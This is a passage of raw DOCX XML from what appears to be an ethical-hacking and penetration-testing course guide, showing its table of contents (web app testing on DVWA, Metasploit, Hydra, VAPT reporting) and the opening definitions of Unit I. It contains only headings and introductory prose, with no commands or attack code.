          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit IV — Web Application Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 A Note on the OWASP Top 10 Category List</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Burp Suite Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 DVWA Setup and Security Levels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 File Upload Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Broken Authentication and DVWA Brute Force with Burp Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit V — VAPT Reporting, Risk Assessment &amp; Professional Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Penetration Test Report Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 CVSS v3.1 Base Score — Worked Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Comparing and Justifying Severity Ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Risk Heat Maps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Remediation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 VAPT Deliverables and Evidence Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Professional Ethics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8 Certification Pathways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Practicals — Detailed Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 1 — Lab Setup &amp; OSINT Reconnaissance (Est. 3 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 2 — Active Scanning and Vulnerability Assessment (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 3 — Exploitation with Metasploit Framework (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 4 — Linux Privilege Escalation (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 5 — Web App Testing: SQL Injection on DVWA (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 6 — Web App Testing: XSS and File Upload on DVWA (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 7 — Password Cracking and Hydra Brute Force (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 8 — Putting It Together: Mini VAPT Assessment (Est. 5 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capstone — Full VAPT Report (Weeks 11–13)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Reusable VAPT Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject Revision Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Glossary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidated Command Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidated Tool &amp; Technique Comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Checklist for Practical Examinations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Mistakes Students Should Avoid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Final Practice Question Set (All Units)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Syllabus Coverage Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:footerReference w:type="default" r:id="rId7"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="1080" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit I — Fundamentals of Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This unit builds the foundation for the whole subject: what hacking is, who does it and why, the law that governs it in India, the documents that make testing legal, the five phases every intrusion follows, and the standards professional testers follow. Get this unit solid — every later unit assumes you understand it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What Is Hacking? What Is Cybersecurity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the act of finding and using weaknesses in a computer system, network, application, or even in people, to gain access, control or information that was not meant to be available to you. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the opposite discipline: the practice of protecting systems, networks and data from exactly this kind of unauthorised access or damage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Almost every organisation today runs on computers and networks, so weaknesses in them translate directly into financial, legal and reputational risk. Understanding how an attacker thinks is the only reliable way to defend against one — this is the whole justification for the existence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ethical hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a profession.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works — the same skill, two outcomes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The techniques, tools (Nmap, Metasploit, Burp Suite) and knowledge used in hacking are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">identical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> whether the person doing it is a defender or a criminal. What decides whether an act is a crime or a service is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">permission and intent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — nothing about the technique itself.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
